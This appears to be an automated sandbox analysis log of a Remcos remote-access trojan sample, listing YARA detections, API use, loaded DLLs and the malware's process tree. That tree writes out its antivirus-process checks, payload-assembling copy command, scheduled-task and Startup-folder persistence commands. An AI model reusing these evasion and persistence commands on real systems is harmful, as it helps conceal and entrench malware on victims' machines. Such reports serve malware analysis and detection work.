                    Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: MSBuild.exe PID: 6776, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.file.exe.49eb26.1.raw.unpack, MapperVisitorQueue.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.49eb26.1.raw.unpack, ConsumerParamConnector.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.file.exe.49eb26.1.raw.unpack, ConsumerParamConnector.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, NYmWRTVrL33R8d5fMNc.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, NYmWRTVrL33R8d5fMNc.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, NYmWRTVrL33R8d5fMNc.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.3.csc.exe.82e3948.3.raw.unpack, NYmWRTVrL33R8d5fMNc.csCryptographic APIs: 'CreateDecryptor'
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 2.3.csc.exe.84e7808.0.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 2.2.csc.exe.9f90000.7.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@41/26@7/4
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426601 GetModuleHandleW,SetWindowsHookExW,GetLastError,FormatMessageW,MessageBoxW,LocalFree,0_2_00426601
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00416AB7
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001E1939 AdjustTokenPrivileges,CloseHandle,23_2_001E1939
                    Source: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scrCode function: 23_2_001E1F3D LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,23_2_001E1F3D
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_004044A5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,4_2_0040E219
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeCode function: 5_2_004024FB CoCreateInstance,5_2_004024FB
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042A7F8 __EH_prolog,FindResourceW,LoadResource,LockResource,CreateWindowExW,SendMessageW,SendMessageW,SendMessageW,GetStockObject,GetObjectW,ImageList_LoadImageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,0_2_0042A7F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,4_2_00419BC4
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Pictures\QuickTextPasteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\ladsjalfhfzmvqpowieyr-3PLE3H
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\mono1234
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ywezrgl.exeJump to behavior
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 50%
                    Source: file.exeString found in binary or memory: <!--StartFrag
                    Source: file.exeString found in binary or memory: <!--StartFragment-->
                    Source: file.exeString found in binary or memory: EndSelectionStartSelection<!--EndFragEndFragment<!--StartFragStartFragmentEndHTML%08u<html>StartHTML<!--EndFragment--></body>
                    Source: file.exeString found in binary or memory: <!--StartFragment-->HTML Format
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ywezrgl.exe C:\Users\user\AppData\Local\Temp\ywezrgl.exe
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmd
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 88473
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "partitionhansenincorporatemichigan" Classics
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Mat + ..\Customize + ..\Downloadcom + ..\Damn + ..\Stylus + ..\Guarantees + ..\Directories + ..\Alice + ..\Pros + ..\Graham T
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif Defensive.pif T
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js"
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url" & echo URL="C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url" & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmdJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 88473Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "partitionhansenincorporatemichigan" Classics Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Mat + ..\Customize + ..\Downloadcom + ..\Damn + ..\Stylus + ..\Guarantees + ..\Directories + ..\Alice + ..\Pros + ..\Graham TJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif Defensive.pif TJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F
                    Source: C:\Users\user\AppData\Local\Temp\88473\Defensive.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url" & echo URL="C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url" & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P"
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: k7rn7l32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntd3ll.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
